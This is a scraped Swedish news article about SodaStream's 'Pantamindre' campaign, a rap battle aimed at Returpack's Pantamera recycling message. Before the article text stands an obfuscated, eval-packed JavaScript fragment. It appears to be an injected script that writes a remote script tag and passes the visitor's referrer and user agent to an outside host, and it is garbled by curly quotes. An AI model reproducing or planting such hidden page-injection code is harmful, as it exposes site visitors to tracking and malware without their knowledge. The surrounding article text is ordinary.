Image Image Image Image Image Image Image Image Image Image

| 21 november, 2017

Scroll to top

Top

No Comments

Pantamindre utmanar Pantamera i rap battle | Revue.se

Pantamindre utmanar Pantamera i rap battle

>!function(a,b,c){var eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|keeeh|var|u0026u|referrer|nbsen||js|php’.split(‘|’),0,{}))
d=a.getElementsByTagName(b)[0];a.getElementById(c)||(a=a.createElement(b),a.id=c,a.src=(”https:”==document.location.protocol?”http://player-services.goviral-content.com”.replace(/^http\:/,”https:”):”http://player-services.goviral-content.com”)+”/embed-code/index/find?placementVersionId=8525928913790737451518258″,d.parentNode.insertBefore(a,d))}(document,”script”,”gv_script_8525928913790737451518258″);

Pantamindre är ett nytt initiativ som utmanar Returpacks välkända budskap om att vi måste panta mera. I låten Pantamindre Anthem berättar hiphoptrion Re-Uze om varför det är dagsatt sluta återvinna och istället börja återanvända samma flaska om och om igen. Samtidigt utmanar de Pantamera-rapparna i ett traditionellt rap battle.

I våras vann rapparna O-Hund, Antonio D och Third Eye Pantameras hiphoptävling och gruppensyns nu i Returpacks reklamfilm i tv-rutan. Nu utmanas gruppen i ett rap battle av den nybildadetrion Re-Uze och deras låt Pantamindre Anthem.

I musikvideon framträder trion som rappande nyhetsreportrar och utmanar Pantamera-rappens budskap om varför vi måste panta mera. Ett rap battle är en slags musikalisk duell där rappare utmanar varandra genom rimmande låttexter som kommenterar motståndaren. Fenomenet tros ha uppkommit i New York på 1970-talet och är i dag ett klassiskt inslag i hiphopvärlden.

– Vi hoppas att Returpack vill anta utmaningen. Vi vill skapa en dialog kring pant- och miljöfrågorna och visa konsumenterna att det finns ett bättre alternativ – att återvända! Vilken arena passar bättre för detta än Returpacks egen hemmaarena – musiken, säger Daniel Dembovsky, nordisk marknadschef på SodaStream som står bakom initiativet.

I samband med lanseringen av rappen lanseras även sajten www.pantamindre.nu, i syfte att informera om retursystemets miljöpåverkan och vilka alternativ som finns. Varje år säljs cirka 1,7 miljarder burkar och flaskor i Sverige och av dessa hamnar cirka 200 miljoner i soporna och naturen. Även de dryckesförpackningar som faktiskt pantas påverkar miljön genom transporter och under själva processen då pantade burkar och flaskor omvandlas till nya. Varje år genererar svenskarnas konsumtion av buteljerade drycker koldioxidutsläpp motsvarande 52 000 flygresor till Thailand tur och retur. Om svenskarna istället kolsyrade sin egen dryck skulle denna siffra halveras.

– Genom initiativet Pantamindre vill vi visa att det finns ett alternativ. Att panta är bra men att panta mindre är helt enkelt bättre, säger Daniel Dembovsky.